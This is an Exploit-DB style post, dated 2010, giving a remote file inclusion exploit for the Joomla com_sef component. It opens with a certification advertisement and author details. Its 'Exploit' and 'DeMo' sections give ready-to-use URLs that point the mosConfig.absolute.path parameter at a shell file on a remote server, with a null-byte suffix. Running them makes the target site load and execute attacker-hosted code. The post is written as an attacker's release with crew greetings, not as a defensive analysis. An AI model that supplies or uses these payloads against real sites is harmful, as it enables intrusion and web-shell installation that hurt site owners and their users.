Joomla! Component com_sef - Remote File Inclusion

EDB-ID:

14055


Author:

Li0n-PaL

Type:

webapps


Platform:

PHP

Date:

2010-06-26


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

==========================================================
Joomla Component (com_sef) RFI
===========================================================

                                          WWw.HaCkTeacH.oRg/cc
                                                                                         
+===================================================================================+
[?]Joomla Component (com_sef) RFI
+===================================================================================+
    [?] My home:              [http://HaCkTeCh.Org/cc           ]
    [?] For Ask:              [F5w@hotmail.com                   ]
    [?] Script:               [     joomla                ]
    [?] home Script           [ http://www.joomla.com/app             ]
    [?] Language:             [ PHP                              ]
    [?] Founder:              [ Li0n-PaL                         ]
    [?] Gr44tz to:            [ Pal-Li0n - Red-D3v1L - Shadow-D3v1L - All HaCkTeacH CreW ]

===[ Exploit  ]===
http://localhost/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=[shell.txt?]

DeMo ~

http://www.example.com/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://[remote-server]/[file]%00


EnJoY o_O

---------------------------------------------------------

./exit